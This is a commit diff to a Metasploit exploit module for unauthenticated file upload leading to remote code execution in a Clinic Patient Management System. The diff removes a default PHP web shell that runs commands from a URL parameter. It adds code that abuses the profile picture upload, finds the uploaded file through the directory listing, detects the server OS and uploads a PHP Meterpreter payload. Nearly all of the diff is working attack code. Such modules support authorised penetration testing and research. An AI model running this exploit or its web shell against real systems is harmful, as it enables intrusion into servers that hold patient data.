msftidy & Rubocop Fixes

aaryan-11-x · aaryan-11-x · commit eb5385a23d0e · 2024-12-16T14:45:04.000+05:30
diff --git a/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb b/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(
@@ -46,85 +47,168 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
-      OptString.new('PHP_PAYLOAD', [false, 'Custom PHP payload to upload', "<?php echo shell_exec($_GET['cmd']); ?>"]),
       OptInt.new('LISTING_DELAY', [true, 'Time to wait before retrieving directory listing (seconds)', 2])
     ])
   end
 
   def check
     print_status('Checking if target is vulnerable...')
 
-    # Check for /pms/users.php endpoint availability
-    print_status('Testing /pms/users.php for upload functionality...')
-    res_users = send_request_cgi({
+    # Step 1: Retrieve PHPSESSID
+    vprint_status('Fetching PHPSESSID from the server...')
+    res_session = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'users.php'),
       'method' => 'GET'
     })
 
-    if res_users && res_users.code == 200 && res_users.body.include?('<form')
-      print_good('/pms/users.php endpoint is accessible!')
-    else
-      print_error('/pms/users.php endpoint is not accessible.')
+    unless res_session && res_session.code == 302 && res_session.get_cookies
+      print_error('Failed to retrieve PHPSESSID. Target may not be vulnerable.')
+      return CheckCode::Safe
+    end
+
+    phpsessid = res_session.get_cookies.match(/PHPSESSID=([^;]+)/)[1]
+    vprint_good("Obtained PHPSESSID: #{phpsessid}")
+
+    # Step 2: Attempt File Upload
+    dummy_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.txt"
+    dummy_content = Rex::Text.rand_text_alphanumeric(20)
+    dummy_name = Rex::Text.rand_text_alphanumeric(6)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(dummy_name, nil, nil, 'form-data; name="display_name"')
+    post_data.add_part(dummy_name, nil, nil, 'form-data; name="user_name"')
+    post_data.add_part(dummy_name, nil, nil, 'form-data; name="password"')
+    post_data.add_part(dummy_content, 'text/plain', nil, "form-data; name=\"profile_picture\"; filename=\"#{dummy_filename}\"")
+    post_data.add_part('', nil, nil, 'form-data; name="save_user"')
+
+    vprint_status("Uploading dummy file #{dummy_filename}...")
+    res_upload = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'users.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'cookie' => "PHPSESSID=#{phpsessid}"
+    })
+
+    unless res_upload && res_upload.code == 302
+      print_error('File upload attempt failed. Target may not be vulnerable.')
       return CheckCode::Safe
     end
+    vprint_good('Dummy file uploaded successfully.')
 
-    # Check if directory listing is enabled on /pms/user_images
-    print_status('Checking for directory listing on /pms/user_images...')
+    # Step 3: Verify File in Directory Listing
+    vprint_status('Verifying uploaded file in /pms/user_images...')
     res_listing = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'user_images/'),
-      'method' => 'GET'
+      'method' => 'GET',
+      'cookie' => "PHPSESSID=#{phpsessid}"
     })
 
-    if res_listing && res_listing.code == 200 && res_listing.body.include?('<a href="')
-      print_good('Directory listing is enabled on /pms/user_images!')
+    if res_listing && res_listing.code == 200 && res_listing.body.include?(dummy_filename)
+      vprint_good("File #{dummy_filename} found in /pms/user_images. Target is vulnerable!")
       return CheckCode::Vulnerable
     else
-      print_error('Directory listing is not enabled on /pms/user_images.')
+      vprint_error("File #{dummy_filename} not found in /pms/user_images. Target may not be vulnerable.")
       return CheckCode::Appears
     end
   end
 
   def upload_shell
     random_user = Rex::Text.rand_text_alphanumeric(8)
     random_password = Rex::Text.rand_text_alphanumeric(12)
-    filename = Rex::Text.rand_text_alphanumeric(8) + '.php'
+    detection_basename = Rex::Text.rand_text_alphanumeric(8).to_s
+    detection_filename = "#{detection_basename}.php"
 
-    # Generate the PHP Meterpreter payload
-    print_status('Generating PHP Meterpreter payload...')
-    payload_content = payload.encoded
+    # Step 1: Detect the OS
+    detection_script = <<~PHP
+      <?php
+      echo PHP_OS . "\\n";
+      ?>
+    PHP
 
+    vprint_status("Uploading OS detection script as #{detection_filename}...")
     post_data = Rex::MIME::Message.new
     post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"')
     post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"')
     post_data.add_part(random_password, nil, nil, 'form-data; name="password"')
-    post_data.add_part(payload_content, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{filename}\"")
+    post_data.add_part(detection_script, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{detection_filename}\"")
     post_data.add_part('', nil, nil, 'form-data; name="save_user"')
 
-    print_status("Uploading PHP Meterpreter payload as #{filename}...")
-    print_status("Using random username: #{random_user}")
-    print_status("Using random password: #{random_password}")
-
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'users.php'),
       'method' => 'POST',
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
       'data' => post_data.to_s
     })
 
-    if res
-      print_status("Server response: #{res.code} #{res.message}")
-      print_status("Response body: #{res.body[0, 500]}") # Limit to 500 chars
+    fail_with(Failure::UnexpectedReply, 'Failed to upload OS detection script') unless res && res.code == 302
+    vprint_good('OS detection script uploaded successfully!')
+
+    # Step 2: Retrieve the actual uploaded filename
+    vprint_status('Retrieving directory listing to identify detection script...')
+    sleep datastore['LISTING_DELAY']
+
+    res_listing = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'user_images/'),
+      'method' => 'GET'
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res_listing && res_listing.code == 200
+
+    matches = res_listing.body.scan(/<a href="(\d+#{Regexp.escape(detection_basename)}\w*\.php)"/)
+    fail_with(Failure::NotFound, 'Uploaded OS detection script not found in directory listing') if matches.empty?
+
+    actual_detection_filename = matches.first.first
+    vprint_status("Detected script filename: #{actual_detection_filename}")
+
+    # Step 3: Execute the detection script
+    detection_url = normalize_uri(target_uri.path, 'user_images', actual_detection_filename)
+    vprint_status("Executing OS detection script at #{detection_url}...")
+    res = send_request_cgi({
+      'uri' => detection_url,
+      'method' => 'GET'
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to execute OS detection script') unless res && res.code == 200
+    detected_os = res.body.strip.downcase
+    print_status("Detected OS: #{detected_os}")
+
+    # Step 4: Choose payload based on OS
+    if detected_os.include?('win')
+      payload_content = get_write_exec_payload
+      print_status('Target is Windows. Using standard PHP Meterpreter payload.')
     else
-      fail_with(Failure::UnexpectedReply, 'No response received from the server')
+      payload_content = get_write_exec_payload(unlink_self: true)
+      print_status('Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self.')
     end
 
+    # Step 5: Upload the payload
+    payload_basename = Rex::Text.rand_text_alphanumeric(8).to_s
+    payload_filename = "#{payload_basename}.php"
+    print_status("Uploading PHP Meterpreter payload as #{payload_filename}...")
+
+    post_data = Rex::MIME::Message.new
+    random_user = Rex::Text.rand_text_alphanumeric(8)
+    random_password = Rex::Text.rand_text_alphanumeric(12)
+    post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"')
+    post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"')
+    post_data.add_part(random_password, nil, nil, 'form-data; name="password"')
+    post_data.add_part(payload_content, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{payload_filename}\"")
+    post_data.add_part('', nil, nil, 'form-data; name="save_user"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'users.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    })
+
     fail_with(Failure::UnexpectedReply, 'Failed to upload PHP payload') unless res && res.code == 302
     print_good('Payload uploaded successfully!')
-    filename
+    payload_filename
   end
 
   def fetch_uploaded_filename
-    print_status('Retrieving directory listing from /pms/user_images...')
+    vprint_status('Retrieving directory listing from /pms/user_images...')
     sleep datastore['LISTING_DELAY'] # Allow time for the file to be saved on the server
 
     res = send_request_cgi({
@@ -149,14 +233,7 @@ def execute_shell(uploaded_file)
     send_request_cgi({
       'uri' => shell_url,
       'method' => 'GET'
-      # 'vars_get' => { 'cmd' => 'id' }
     })
-
-    # if res && res.code == 200
-    #   print_good("Command executed successfully! Output:\n#{res.body}")
-    # else
-    #   fail_with(Failure::UnexpectedReply, 'Failed to execute the uploaded shell')
-    # end
   end
 
   def exploit
